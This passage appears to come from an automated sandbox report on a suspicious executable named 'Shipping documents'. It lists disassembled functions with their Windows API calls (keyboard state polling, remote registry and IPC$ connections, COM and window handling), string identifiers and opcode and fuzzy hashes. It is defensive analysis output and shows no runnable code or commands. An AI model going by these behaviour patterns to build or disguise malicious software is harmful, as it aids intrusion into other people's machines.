                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: IconMessageSend$ImageList_$ClientCreateDestroyExtractRectRedrawReplaceWindow
                                                                                                          • String ID: 2
                                                                                                          • API String ID: 1331449709-450215437
                                                                                                          • Opcode ID: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction ID: 8a8bfaa361b8e4ad447499ed02e60938d35b352fbee86dd909721fc396438cf5
                                                                                                          • Opcode Fuzzy Hash: 35af861e1287c83bf6b22685c9feb70a55a109cab4d535c9bbd66d0cf124b3e0
                                                                                                          • Instruction Fuzzy Hash: 19519070A00209AFDB10CF98CD95BEEB7B5FF49310F10815AEA09AB3A1D7B4AD41CB55
                                                                                                          Function 0046081F Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 139COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0
                                                                                                            • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                            • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
                                                                                                          • LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
                                                                                                          • __swprintf.LIBCMT ref: 00460915
                                                                                                          • __swprintf.LIBCMT ref: 0046092D
                                                                                                          • _wprintf.LIBCMT ref: 004609E1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: HandleLoadModuleString__swprintf$_memmove_wcslen_wprintf
                                                                                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d:$^ ERROR
                                                                                                          • API String ID: 3054410614-2561132961
                                                                                                          • Opcode ID: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction ID: 8ea7bd36613c7ff98b4c02c5a019b599898316a67ab96f708308d0ed756dbd7a
                                                                                                          • Opcode Fuzzy Hash: 70def87c4b28ee4ab6614adc46955888b63d74e37d3694ee9c83f9e80406ad7b
                                                                                                          • Instruction Fuzzy Hash: 654183B29001099BDB00FBD1DC9AAEF7778EF44354F45403AF504B7192EB78AA45CBA9
                                                                                                          Function 00458651 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 135registryshareCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                            • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                          • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00458721
                                                                                                          • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0045873E
                                                                                                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?), ref: 0045875C
                                                                                                          • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?), ref: 0045878A
                                                                                                          • CLSIDFromString.OLE32(?,?), ref: 004587B3
                                                                                                          • RegCloseKey.ADVAPI32(000001FE), ref: 004587BF
                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 004587C5
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_wcslen
                                                                                                          • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                          • API String ID: 600699880-22481851
                                                                                                          • Opcode ID: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction ID: 095cb2d92039a6881e8bf561e9cb0619f72fc8c68408713302cc045b8cca0367
                                                                                                          • Opcode Fuzzy Hash: cfc91adc3568b3696bc93f198b4a86b184f94eddf56cabac594ca02b2fd0747b
                                                                                                          • Instruction Fuzzy Hash: 58415275D0020DABCB04EBA4DC45ADE77B8EF48304F10846EE914B7291EF78A909CB94
                                                                                                          Function 00450C41 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 122COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: DestroyWindow
                                                                                                          • String ID: static
                                                                                                          • API String ID: 3375834691-2160076837
                                                                                                          • Opcode ID: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction ID: e571488c54e010bbe3192cf51c39f0d33963e2fa0fa89bc12fd4c8100c345edb
                                                                                                          • Opcode Fuzzy Hash: d780a762e7facdedeb15ece3d926807f2c32385f8c9501599d87c18bab5c95b9
                                                                                                          • Instruction Fuzzy Hash: 2C41B375200205ABDB149F64DC85FEB33A8EF89725F20472AFA15E72C0D7B4E841CB68
                                                                                                          Function 0045D94B Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 88COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D959
                                                                                                          • GetDriveTypeW.KERNEL32(?,?), ref: 0045D9AB
                                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045DA4B
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                          • String ID: CDROM$Fixed$Network$RAMDisk$Removable$Unknown$\VH
                                                                                                          • API String ID: 2907320926-3566645568
                                                                                                          • Opcode ID: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction ID: 8c6a7395db7573f60177d60b7e789de744ab79b943898383e565048f237880a7
                                                                                                          • Opcode Fuzzy Hash: d176aaa606c69a21fa64de5f54fcf515c340d5c4a7f23c4320f7b4e4ff292d02
                                                                                                          • Instruction Fuzzy Hash: B7316E35A042049BCB10FFA9C48595EB771FF88315B1088ABFD05AB392C739DD45CB6A
                                                                                                          Function 00470928 Relevance: 16.7, APIs: 11, Instructions: 166windowtimeCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00430003: InvalidateRect.USER32(?,00000000,00000001), ref: 00430091
                                                                                                          • DestroyAcceleratorTable.USER32(?), ref: 0047094A
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709AD
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709C5
                                                                                                          • ImageList_Destroy.COMCTL32(?), ref: 004709D5
                                                                                                          • DeleteObject.GDI32(00610000), ref: 00470A04
                                                                                                          • DestroyIcon.USER32(004C005C), ref: 00470A1C
                                                                                                          • DeleteObject.GDI32(ACECE5E6), ref: 00470A34
                                                                                                          • DestroyWindow.USER32(0065006E), ref: 00470A4C
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A73
                                                                                                          • DestroyIcon.USER32(?), ref: 00470A81
                                                                                                          • KillTimer.USER32(00000000,00000000), ref: 00470B00
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Destroy$IconImageList_$DeleteObject$AcceleratorInvalidateKillRectTableTimerWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1237572874-0
                                                                                                          • Opcode ID: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction ID: 3938066daea6daae9dc0c39577387909b3bcb8112bd91d3310d64c2ecda3814a
                                                                                                          • Opcode Fuzzy Hash: 4ee17edbf3fbf185c7a1b530a933687592c26a3f705ddbb244818e4a2882b4b3
                                                                                                          • Instruction Fuzzy Hash: 24616874601201CFE714DF65DD94FAA77B8FB6A304B54856EE6098B3A2CB38EC41CB58
                                                                                                          Function 00479362 Relevance: 16.6, APIs: 11, Instructions: 147memoryCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,004795FD), ref: 00479380
                                                                                                          • SafeArrayAllocData.OLEAUT32(004795FD), ref: 004793CF
                                                                                                          • VariantInit.OLEAUT32(?), ref: 004793E1
                                                                                                          • SafeArrayAccessData.OLEAUT32(004795FD,?), ref: 00479402
                                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00479461
                                                                                                          • SafeArrayUnaccessData.OLEAUT32(004795FD), ref: 00479474
                                                                                                          • VariantClear.OLEAUT32(?), ref: 00479489
                                                                                                          • SafeArrayDestroyData.OLEAUT32(004795FD), ref: 004794AE
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794B8
                                                                                                          • VariantClear.OLEAUT32(?), ref: 004794CA
                                                                                                          • SafeArrayDestroyDescriptor.OLEAUT32(004795FD), ref: 004794E7
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                          • String ID:
                                                                                                          • API String ID: 2706829360-0
                                                                                                          • Opcode ID: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                          • Instruction ID: 8c269571b42c1441f814514f03b92edd351012a73d8239c9f379a0a89e1b4ae1
                                                                                                          • Opcode Fuzzy Hash: 604ca7338ef7579289b82c182b4992e50dced26e61eee24e9e1f7f7e4088d468
                                                                                                          • Instruction Fuzzy Hash: F6515E76A00119ABCB00DFA5DD849DEB7B9FF88704F10856EE905A7241DB749E06CBA4
                                                                                                          Function 004447E0 Relevance: 16.6, APIs: 11, Instructions: 130keyboardCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • GetKeyboardState.USER32(?), ref: 0044480E
                                                                                                          • GetAsyncKeyState.USER32(000000A0), ref: 00444899
                                                                                                          • GetKeyState.USER32(000000A0), ref: 004448AA
                                                                                                          • GetAsyncKeyState.USER32(000000A1), ref: 004448C8
                                                                                                          • GetKeyState.USER32(000000A1), ref: 004448D9
                                                                                                          • GetAsyncKeyState.USER32(00000011), ref: 004448F5
                                                                                                          • GetKeyState.USER32(00000011), ref: 00444903
                                                                                                          • GetAsyncKeyState.USER32(00000012), ref: 0044491F
                                                                                                          • GetKeyState.USER32(00000012), ref: 0044492D
                                                                                                          • GetAsyncKeyState.USER32(0000005B), ref: 00444949
                                                                                                          • GetKeyState.USER32(0000005B), ref: 00444958
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$Async$Keyboard
                                                                                                          • String ID:
                                                                                                          • API String ID: 541375521-0
                                                                                                          • Opcode ID: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                          • Instruction ID: 827c2ee343902556a703916e37c968ecd50c133e95067caf6822082f003788d3
                                                                                                          • Opcode Fuzzy Hash: 9fce1f5b3a66d3eff563dda32bd6bc0484776d74d04e18c21d6e4f8d76764453
                                                                                                          • Instruction Fuzzy Hash: 27412B34A047C969FF31A6A4C8043A7BBA16FA1314F04805FD5C5477C1DBED99C8C7A9
                                                                                                          Function 00470B6C Relevance: 16.6, APIs: 11, Instructions: 125COMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: InitVariant$_malloc_wcscpy_wcslen
                                                                                                          • String ID:
                                                                                                          • API String ID: 3413494760-0
                                                                                                          • Opcode ID: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                          • Instruction ID: 93a03e1dde4748921c3f7e50244c45dc9774a8ad470eaa8d68eb3f4e8808ad8d
                                                                                                          • Opcode Fuzzy Hash: b3fce9f732112990bbb163bb6abadbd830b92813f31b22ad1e38064008f16c53
                                                                                                          • Instruction Fuzzy Hash: 33414BB260070AAFC754DF69C880A86BBE8FF48314F00862AE619C7750D775E564CBE5
                                                                                                          Function 004542ED Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 271libraryloaderCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AddressProc_free_malloc$_strcat_strlen
                                                                                                          • String ID: AU3_FreeVar
                                                                                                          • API String ID: 2634073740-771828931
                                                                                                          • Opcode ID: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                          • Instruction ID: 8d08e60933d1045585c44e473594da8d0bbfd8a8652ecee4fcef853dc29158a1
                                                                                                          • Opcode Fuzzy Hash: 8752c60cbf461b2b1ad9d0d2e6ce46fc02185390cfde25c6fd7db8b8bd3e9615
                                                                                                          • Instruction Fuzzy Hash: 00B1ADB4A00206DFCB00DF55C880A6AB7A5FF88319F2485AEED058F352D739ED95CB94
                                                                                                          Function 0046C5FA Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 208comCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • CoInitialize.OLE32 ref: 0046C63A
                                                                                                          • CoUninitialize.OLE32 ref: 0046C645
                                                                                                            • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                            • Part of subcall function 0044CB87: CreateDispTypeInfo.OLEAUT32(?,00000800,?), ref: 0044CBD4
                                                                                                            • Part of subcall function 0044CB87: CreateStdDispatch.OLEAUT32(00000000,?,?,?), ref: 0044CBF4
                                                                                                          • CLSIDFromProgID.OLE32(00000000,?), ref: 0046C694
                                                                                                          • CLSIDFromString.OLE32(00000000,?), ref: 0046C6A4
                                                                                                          • CoCreateInstance.OLE32(?,00000000,00000017,00482998,?), ref: 0046C6CD
                                                                                                          • IIDFromString.OLE32(?,?), ref: 0046C705
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateFrom$String$DispDispatchInfoInitializeInstanceProgTypeUninitialize_malloc
                                                                                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                          • API String ID: 2294789929-1287834457
                                                                                                          • Opcode ID: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                          • Instruction ID: adb6a6f601bf1a612e569d1fac1689f55b30b767fcafa950e0578031a668eb85
                                                                                                          • Opcode Fuzzy Hash: 4dfaed0549f409efa28524cf643488acd2e6b782f2d71f2a42dfc1cbbaa944b5
                                                                                                          • Instruction Fuzzy Hash: B861BC712043019FD710EF21D885B7BB3E8FB84715F10891EF9859B241E779E909CBAA
                                                                                                          Function 004710F1 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 157windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                            • Part of subcall function 00456391: GetCursorPos.USER32(?), ref: 004563A6
                                                                                                            • Part of subcall function 00456391: ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                            • Part of subcall function 00456391: GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                          • DefDlgProcW.USER32(?,00000205,?,?), ref: 00471145
                                                                                                          • ImageList_DragLeave.COMCTL32(00000000), ref: 00471163
                                                                                                          • ImageList_EndDrag.COMCTL32 ref: 00471169
                                                                                                          • ReleaseCapture.USER32 ref: 0047116F
                                                                                                          • SetWindowTextW.USER32(?,00000000), ref: 00471206
                                                                                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00471216
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123280592.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123298977.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123317319.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123361063.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_Shipping documents.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AsyncDragImageList_State$CaptureClientCursorLeaveMessageProcReleaseScreenSendTextWindow
                                                                                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                          • API String ID: 2483343779-2107944366
                                                                                                          • Opcode ID: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                          • Instruction ID: f70d9246110d4513cc5ea0640624bfdb04bec8758509bedf4130776013c57ff9
                                                                                                          • Opcode Fuzzy Hash: 20a5a3ce7c175183900f948b12cd71fc676271c7bfbce6bb48b8262f94f29e03
                                                                                                          • Instruction Fuzzy Hash: D751E5706002109FD700EF59CC85BAF77A5FB89310F004A6EF945A72E2DB789D45CBAA
                                                                                                          Function 004505F0 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 147windowCOMMON
                                                                                                          Download Yara Rule
                                                                                                          APIs
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 004506A0
                                                                                                          • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 004506B4
                                                                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 004506D5
                                                                                                          • _wcslen.LIBCMT ref: 00450720
                                                                                                          • _wcscat.LIBCMT ref: 00450733
                                                                                                          • SendMessageW.USER32(?,00001057,00000000,?), ref: 0045074C
                                                                                                          • SendMessageW.USER32(?,00001061,?,?), ref: 0045077E
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2123215660.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2123199904.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2123263333.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
